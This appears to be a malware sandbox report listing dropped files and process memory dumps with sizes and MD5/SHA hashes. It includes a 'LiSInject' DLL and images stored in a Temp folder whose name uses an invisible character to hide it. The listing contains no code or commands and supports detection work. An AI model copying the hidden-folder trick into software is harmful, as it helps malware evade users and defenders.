dbbb6dde4ab09eeb587afcc1f02007b5df9b02cd8038b91f6733add656f4f68892c0237c3704f8f4e8b73c144d4355e9539bdbd78abf5acd1d019b8dcad3dce9

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎  \Common Files\Pictures\My Wallpaper.jpg

Filesize
24KB

MD5
a51464e41d75b2aa2b00ca31ea2ce7eb

SHA1
5b94362ac6a23c5aba706e8bfd11a5d8bab6097d

SHA256
16d5506b6663085b1acd80644ffa5363c158e390da67ed31298b85ddf0ad353f

SHA512
b2a09d52c211e7100e3e68d88c13394c64f23bf2ec3ca25b109ffb1e1a96a054f0e0d25d2f2a0c2145616eabc88c51d63023cef5faa7b49129d020f67ab0b1ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎  \Common Files\Pictures\ProtectRequest.jpeg

Filesize
230KB

MD5
d0fd7c01819de035e400270664aedc81

SHA1
a68943563a08f4e04e9238a2c0555dc445dbccbc

SHA256
f30171ae8b8630b5c92232c26401f42820d9095beaf431a5c491e31b902c9a7b

SHA512
272fd193d8eff794b0635e44204097110be7d733720d63eb864b8b7260b2c45dbf5742c628b971397a284fd7a5218df4d907a3de36d31b35557b5bda04b8e7e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎  \Common Files\Pictures\WriteDisconnect.jpg

Filesize
303KB

MD5
201c0b04637921e81d04e2afc37744c8

SHA1
5035067e52098566545869e2e92236629f053bc4

SHA256
70b7405800314439f5d09ee4b9bd9df3ce6664e9fc42fd190c02450428eabd49

SHA512
cadb7e26562e2d3bae74f8a4b449ced455fe48f50e305bb3e9704fe4b55087d1e08106a5087751123e971eccc99d006861b192a6c16b005e47b5f4ede8a1faf8

Download Submit
C:\Users\Admin\Desktop\LiSInject\amboit.dll

Filesize
619KB

MD5
8e5926c798e62e3862e86d12bc2c09c1

SHA1
4ef4655d38dd9354a70453f7dc363a6e69bb2ab4

SHA256
652f86f48e144bedafb2346f3877d51e249aad3077dcf927602122fb82c30bdc

SHA512
8bd6c40d4182861a1a96e0f443a9b04bf6f78de7c7047f1034fb16488ff7eed8b1072dac4ace3d9969f141dd217d91c3c5f5c8f1cba94846746b79259e9a155a

Download Submit
memory/1832-166-0x000001E17CF20000-0x000001E17CF42000-memory.dmp

Filesize
136KB

Download
memory/1932-306-0x00007FFDD6CD0000-0x00007FFDD6CE9000-memory.dmp

Filesize
100KB

Download
memory/1932-302-0x00007FFDC1310000-0x00007FFDC13DE000-memory.dmp

Filesize
824KB

Download
memory/1932-279-0x00007FFDDA5A0000-0x00007FFDDA5AD000-memory.dmp

Filesize
52KB

Download
memory/1932-282-0x00007FFDC1310000-0x00007FFDC13DE000-memory.dmp

Filesize
824KB

Download
memory/1932-278-0x00007FFDC9840000-0x00007FFDC9859000-memory.dmp

Filesize
100KB

Download
memory/1932-284-0x00007FFDBFB20000-0x00007FFDC0053000-memory.dmp

Filesize
5.2MB

Download
memory/1932-283-0x0000018A60680000-0x0000018A60BB3000-memory.dmp

Filesize
5.2MB

Download
memory/1932-309-0x00007FFDC9800000-0x00007FFDC9833000-memory.dmp

Filesize
204KB

Download
memory/1932-310-0x00007FFDC8730000-0x00007FFDC8DF2000-memory.dmp

Filesize
6.8MB

Download
memory/1932-308-0x00007FFDDA5A0000-0x00007FFDDA5AD000-memory.dmp

Filesize
52KB

Download
memory/1932-307-0x00007FFDC9840000-0x00007FFDC9859000-memory.dmp

Filesize
100KB

Download
memory/1932-280-0x00007FFDC9800000-0x00007FFDC9833000-memory.dmp

Filesize
204KB

Download
memory/1932-305-0x00007FFDC1770000-0x00007FFDC18EF000-memory.dmp

Filesize
1.5MB

Download
memory/1932-304-0x00007FFDD6CF0000-0x00007FFDD6D1C000-memory.dmp

Filesize
176KB

Download
memory/1932-303-0x00007FFDDA620000-0x00007FFDDA645000-memory.dmp

Filesize
148KB

Download
memory/1932-272-0x00007FFDD6CF0000-0x00007FFDD6D1C000-memory.dmp

Filesize
176KB

Download
memory/1932-301-0x00007FFDC97E0000-0x00007FFDC97F4000-memory.dmp

Filesize
80KB

Download
memory/1932-300-0x00007FFDD67C0000-0x00007FFDD67E4000-memory.dmp

Filesize
144KB

Download
memory/1932-299-0x00007FFDDAC30000-0x00007FFDDAC3F000-memory.dmp

Filesize
60KB

Download
memory/1932-298-0x00007FFDDA570000-0x00007FFDDA57D000-memory.dmp

Filesize
52KB

Download
memory/1932-296-0x00007FFDBFB20000-0x00007FFDC0053000-memory.dmp

Filesize
5.2MB

Download
memory/1932-285-0x00007FFDC8730000-0x00007FFDC8DF2000-memory.dmp

Filesize
6.8MB

Download
memory/1932-277-0x00007FFDC1770000-0x00007FFDC18EF000-memory.dmp

Filesize
1.5MB

Download
memory/1932-251-0x00007FFDC8730000-0x00007FFDC8DF2000-memory.dmp

Filesize
6.8MB

Download
memory/1932-274-0x00007FFDD6CD0000-0x00007FFDD6CE9000-memory.dmp

Filesize
100KB

Download
memory/1932-276-0x00007FFDD67C0000-0x00007FFDD67E4000-memory.dmp

Filesize
144KB

Download
memory/1932-252-0x00007FFDDA620000-0x00007FFDDA645000-memory.dmp

Filesize
148KB

Download
memory/1932-254-0x00007FFDDAC30000-0x00007FFDDAC3F000-memory.dmp

Filesize
60KB

Download
memory/2372-399-0x00000199578C0000-0x00000199578C8000-memory.dmp

Filesize
32KB

Download
memory/3104-596-0x00007FFDC8AF0000-0x00007FFDC9023000-memory.dmp

Filesize
5.2MB

Download
memory/3104-673-0x00007FFDDAE20000-0x00007FFDDAE4C000-memory.dmp

Filesize
176KB

Download
memory/3104-911-0x00007FFDDDBE0000-0x00007FFDDDC05000-memory.dmp

Filesize
148KB

Download
memory/3104-910-0x00007FFDC9030000-0x00007FFDC96F2000-memory.dmp

Filesize
6.8MB

Download
memory/3104-698-0x0000021097EA0000-0x00000210983D3000-memory.dmp

Filesize
5.2MB

Download
memory/3104-697-0x00007FFDC8AF0000-0x00007FFDC9023000-memory.dmp

Filesize
5.2MB

Download
memory/3104-696-0x00007FFDDAC50000-0x00007FFDDAC83000-memory.dmp

Filesize
204KB

Download
memory/3104-676-0x00007FFDD6EA0000-0x00007FFDD6FBA000-memory.dmp

Filesize
1.1MB

Download
memory/3104-680-0x00007FFDD71A0000-0x00007FFDD731F000-memory.dmp

Filesize
1.5MB

Download
memory/3104-677-0x00007FFDDAC90000-0x00007FFDDACB4000-memory.dmp

Filesize
144KB

Download
memory/3104-675-0x00007FFDDDBC0000-0x00007FFDDDBD9000-memory.dmp

Filesize
100KB

Download
memory/3104-670-0x00007FFDDDBE0000-0x00007FFDDDC05000-memory.dmp

Filesize
148KB

Download
memory/3104-672-0x00007FFDDADF0000-0x00007FFDDADFD000-memory.dmp

Filesize
52KB

Download
memory/3104-671-0x00007FFDDAC30000-0x00007FFDDAC44000-memory.dmp

Filesize
80KB

Download
memory/3104-594-0x00007FFDC9030000-0x00007FFDC96F2000-memory.dmp

Filesize
6.8MB

Download
memory/3104-597-0x0000021097EA0000-0x00000210983D3000-memory.dmp

Filesize
5.2MB

Download
memory/3104-598-0x00007FFDD70D0000-0x00007FFDD719E000-memory.dmp

Filesize
824KB

Download
memory/3104-595-0x00007FFDDAC50000-0x00007FFDDAC83000-memory.dmp

Filesize
204KB

Download
memory/3104-581-0x00007FFDC9030000-0x00007FFDC96F2000-memory.dmp

Filesize
6.8MB

Download
memory/3104-582-0x00007FFDDDBE0000-0x00007FFDDDC05000-memory.dmp

Filesize
148KB

Download
memory/3104-583-0x00007FFDDDDD0000-0x00007FFDDDDDF000-memory.dmp

Filesize
60KB

Download
memory/3104-588-0x00007FFDDAE20000-0x00007FFDDAE4C000-memory.dmp

Filesize
176KB

Download
memory/3104-589-0x00007FFDDDBC0000-0x00007FFDDDBD9000-memory.dmp

Filesize
100KB

Download
memory/3104-590-0x00007FFDDAC90000-0x00007FFDDACB4000-memory.dmp

Filesize
144KB

Download
memory/3104-591-0x00007FFDD71A0000-0x00007FFDD731F000-memory.dmp

Filesize
1.5MB

Download
memory/3104-593-0x00007FFDDDC90000-0x00007FFDDDC9D000-memory.dmp

Filesize
52KB

Download
memory/3104-592-0x00007FFDDADB0000-0x00007FFDDADC9000-memory.dmp

Filesize
100KB

Download
memory/3420-679-0x00007FFDDAC20000-0x00007FFDDAC2F000-memory.dmp

Filesize
60KB

Download
memory/3420-731-0x00007FFDBFB20000-0x00007FFDC0053000-memory.dmp

Filesize
5.2MB

Download
memory/3420-732-0x00007FFDD9F00000-0x00007FFDD9F14000-memory.dmp

Filesize
80KB

Download
memory/3420-720-0x00007FFDC8420000-0x00007FFDC8AE2000-memory.dmp

Filesize
6.8MB

Download
memory/3420-694-0x00007FFDD6D00000-0x00007FFDD6D19000-memory.dmp

Filesize
100KB

Download
memory/3420-695-0x00007FFDD6CD0000-0x00007FFDD6CF4000-memory.dmp

Filesize
144KB

Download
memory/3420-699-0x00007FFDC2200000-0x00007FFDC237F000-memory.dmp

Filesize
1.5MB

Download
memory/3420-690-0x00007FFDD9ED0000-0x00007FFDD9EFC000-memory.dmp

Filesize
176KB

Download
memory/3420-674-0x00007FFDC8420000-0x00007FFDC8AE2000-memory.dmp

Filesize
6.8MB

Download
memory/3420-678-0x00007FFDDAA00000-0x00007FFDDAA25000-memory.dmp

Filesize
148KB

Download
memory/3856-455-0x00007FFDDA9E0000-0x00007FFDDAAAE000-memory.dmp

Filesize
824KB

Download
memory/3856-275-0x00007FFDD6DE0000-0x00007FFDD7313000-memory.dmp

Filesize
5.2MB

Download
memory/3856-498-0x00007FFDDAE20000-0x00007FFDDAE44000-memory.dmp

Filesize
144KB

Download
memory/3856-496-0x00007FFDDDBE0000-0x00007FFDDDC0C000-memory.dmp

Filesize
176KB

Download
memory/3856-500-0x00007FFDDDC90000-0x00007FFDDDC9D000-memory.dmp

Filesize
52KB

Download
memory/3856-454-0x00007FFDDAC80000-0x00007FFDDACB3000-memory.dmp

Filesize
204KB

Download
memory/3856-495-0x00007FFDDE900000-0x00007FFDDE90F000-memory.dmp

Filesize
60KB

Download
memory/3856-501-0x00007FFDDADB0000-0x00007FFDDADC9000-memory.dmp

Filesize
100KB

Download
memory/3856-502-0x00007FFDDAC80000-0x00007FFDDACB3000-memory.dmp

Filesize
204KB

Download
memory/3856-494-0x00007FFDDDDD0000-0x00007FFDDDDF5000-memory.dmp

Filesize
148KB

Download
memory/3856-497-0x00007FFDDDBC0000-0x00007FFDDDBD9000-memory.dmp

Filesize
100KB

Download
memory/3856-493-0x00007FFDD6DE0000-0x00007FFDD7313000-memory.dmp

Filesize
5.2MB

Download
memory/3856-492-0x00007FFDC8F10000-0x00007FFDC902A000-memory.dmp

Filesize
1.1MB

Download
memory/3856-491-0x00007FFDDADF0000-0x00007FFDDADFD000-memory.dmp

Filesize
52KB

Download
memory/3856-490-0x00007FFDDAC60000-0x00007FFDDAC74000-memory.dmp

Filesize
80KB

Download
memory/3856-281-0x00007FFDC8F10000-0x00007FFDC902A000-memory.dmp

Filesize
1.1MB

Download
memory/3856-273-0x000002C59FE90000-0x000002C5A03C3000-memory.dmp

Filesize
5.2MB

Download
memory/3856-271-0x00007FFDDA9E0000-0x00007FFDDAAAE000-memory.dmp

Filesize
824KB

Download
memory/3856-488-0x00007FFDDA9E0000-0x00007FFDDAAAE000-memory.dmp

Filesize
824KB

Download
memory/3856-270-0x00007FFDDAC80000-0x00007FFDDACB3000-memory.dmp

Filesize
204KB

Download
memory/3856-445-0x00007FFDC9030000-0x00007FFDC96F2000-memory.dmp

Filesize
6.8MB

Download
memory/3856-253-0x00007FFDDDC90000-0x00007FFDDDC9D000-memory.dmp

Filesize
52KB

Download
memory/3856-451-0x00007FFDD9FD0000-0x00007FFDDA14F000-memory.dmp

Filesize
1.5MB

Download
memory/3856-499-0x00007FFDD9FD0000-0x00007FFDDA14F000-memory.dmp

Filesize
1.5MB

Download
memory/3856-250-0x00007FFDD9FD0000-0x00007FFDDA14F000-memory.dmp

Filesize
1.5MB

Download
memory/3856-249-0x00007FFDDAE20000-0x00007FFDDAE44000-memory.dmp

Filesize
144KB

Download
memory/3856-157-0x00007FFDC8F10000-0x00007FFDC902A000-memory.dmp

Filesize
1.1MB

Download
memory/3856-155-0x00007FFDDDBE0000-0x00007FFDDDC0C000-memory.dmp

Filesize
176KB

Download
memory/3856-156-0x00007FFDDADF0000-0x00007FFDDADFD000-memory.dmp

Filesize
52KB

Download
memory/3856-154-0x00007FFDDAC60000-0x00007FFDDAC74000-memory.dmp

Filesize
80KB

Download
memory/3856-150-0x00007FFDDA9E0000-0x00007FFDDAAAE000-memory.dmp

Filesize
824KB

Download
memory/3856-151-0x000002C59FE90000-0x000002C5A03C3000-memory.dmp

Filesize
5.2MB

Download
memory/3856-153-0x00007FFDDDDD0000-0x00007FFDDDDF5000-memory.dmp

Filesize
148KB

Download
memory/3856-152-0x00007FFDD6DE0000-0x00007FFDD7313000-memory.dmp

Filesize
5.2MB

Download
memory/3856-149-0x00007FFDC9030000-0x00007FFDC96F2000-memory.dmp

Filesize
6.8MB

Download
memory/3856-146-0x00007FFDDADB0000-0x00007FFDDADC9000-memory.dmp

Filesize
100KB

Download
memory/3856-148-0x00007FFDDAC80000-0x00007FFDDACB3000-memory.dmp

Filesize
204KB

Download
memory/3856-147-0x00007FFDDDC90000-0x00007FFDDDC9D000-memory.dmp

Filesize
52KB

Download
memory/3856-145-0x00007FFDD9FD0000-0x00007FFDDA14F000-memory.dmp

Filesize
1.5MB

Download
memory/3856-478-0x00007FFDC9030000-0x00007FFDC96F2000-memory.dmp

Filesize
6.8MB

Download
memory/3856-446-0x00007FFDDDDD0000-0x00007FFDDDDF5000-memory.dmp

Filesize
148KB

Download
memory/3856-143-0x00007FFDDDBC0000-0x00007FFDDDBD9000-memory.dmp

Filesize
100KB

Download
memory/3856-144-0x00007FFDDAE20000-0x00007FFDDAE44000-memory.dmp

Filesize
144KB

Download
memory/3856-142-0x00007FFDDDBE0000-0x00007FFDDDC0C000-memory.dmp

Filesize
176KB

Download
memory/3856-85-0x00007FFDDDDD0000-0x00007FFDDDDF5000-memory.dmp

Filesize
148KB

Download
memory/3856-137-0x00007FFDDE900000-0x00007FFDDE90F000-memory.dmp

Filesize
60KB

Download
memory/3856-80-0x00007FFDC9030000-0x00007FFDC96F2000-memory.dmp

Filesize
6.8MB

Download